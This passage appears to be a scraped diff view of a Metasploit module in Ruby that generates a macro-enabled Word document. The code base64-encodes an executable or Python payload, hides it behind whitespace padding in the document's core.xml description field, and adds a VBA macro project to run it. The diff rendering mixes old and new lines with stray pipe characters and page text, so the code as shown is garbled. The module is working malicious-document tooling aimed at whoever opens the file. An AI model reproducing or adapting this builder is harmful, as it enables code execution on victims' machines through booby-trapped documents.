|
||||||
|
add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml')
|
||||||
|
|
||||||
|
pattern = 'Override[@PartName="/word/document.xml"]'
|
||||||
|
attribute_name = 'ContentType'
|
||||||
|
scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml'
|
||||||
|
update_content_type(pattern, attribute_name, scheme)
|
||||||
|
|
||||||
|
scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject'
|
||||||
|
fname = 'vbaProject.bin'
|
||||||
|
add_doc_relationship(scheme, fname)
|
||||||
|
|
||||||
|
@docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
|
||||||
|
@docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
|
||||||
|
@docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbadata_xml
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaData.xml'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbaproject_bin_rels
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbaproject_bin
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaProject.bin'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_core_xml
|
||||||
|
File.read(File.join(macro_resource_directory, 'core.xml'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def create_core_xml_file
|
||||||
|
add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml')
|
||||||
|
add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml')
|
||||||
|
@docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) }
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_payload
|
||||||
|
p = padding = ' ' * 55
|
||||||
|
p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
|
||||||
|
|
||||||
|
begin
|
||||||
|
core_xml = get_file_in_docx('docProps/core.xml')
|
||||||
|
rescue Msf::Exploit::Failed
|
||||||
|
end
|
||||||
|
|
||||||
|
unless core_xml
|
||||||
|
print_status('Missing docProps/core.xml to inject the payload to. Using the default one.')
|
||||||
|
create_core_xml_file
|
||||||
|
core_xml = get_file_in_docx('docProps/core.xml')
|
||||||
|
end
|
||||||
|
|
||||||
|
description_node = core_xml.at('//cp:coreProperties//dc:description')
|
||||||
|
description_node.content = p
|
||||||
|
end
|
||||||
|
|
||||||
|
def unpack_docx(template_path)
|
||||||
|
doc = []
|
||||||
|
|
||||||
|
Zip::File.open(template_path) do |entries|
|
||||||
|
entries.each do |entry|
|
||||||
|
if entry.name.match(/\.xml|\.rels$/i)
|
||||||
|
content = Nokogiri::XML(entry.get_input_stream.read)
|
||||||
|
else
|
||||||
|
content = entry.get_input_stream.read
|
||||||
end
|
end
|
||||||
|
|
||||||
|
vprint_status("Parsing item from template: #{entry.name}")
|
||||||
|
|
||||||
|
doc << { fname: entry.name, data: content }
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
zip.pack
|
doc
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def pack_docm
|
||||||
|
@docx.each do |entry|
|
||||||
|
if entry[:data].kind_of?(Nokogiri::XML::Document)
|
||||||
|
entry[:data] = entry[:data].to_s
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
Msf::Util::EXE.to_zip(@docx)
|
||||||
|
end
|
||||||
|
|
||||||
|
def macro_resource_directory
|
||||||
|
@macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_template_path
|
||||||
|
if datastore['CUSTOMTEMPLATE']
|
||||||
|
datastore['CUSTOMTEMPLATE']
|
||||||
|
else
|
||||||
|
File.join(macro_resource_directory, 'template.docx')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
print_status('Generating our docm file...')
|
template_path = get_template_path
|
||||||
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
|
print_status("Using template: #{template_path}")
|
||||||
docm = package_docm(path)
|
@docx = unpack_docx(template_path)
|
||||||
|
|
||||||
|
print_status('Injecting payload in document comments')
|
||||||
|
inject_payload
|
||||||
|
|
||||||
|
print_status('Injecting macro and other required files in document')
|
||||||
|
inject_macro
|
||||||
|
|
||||||
|
print_status("Finalizing docm: #{datastore['FILENAME']}")
|
||||||
|
docm = pack_docm
|
||||||
file_create(docm)
|
file_create(docm)
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue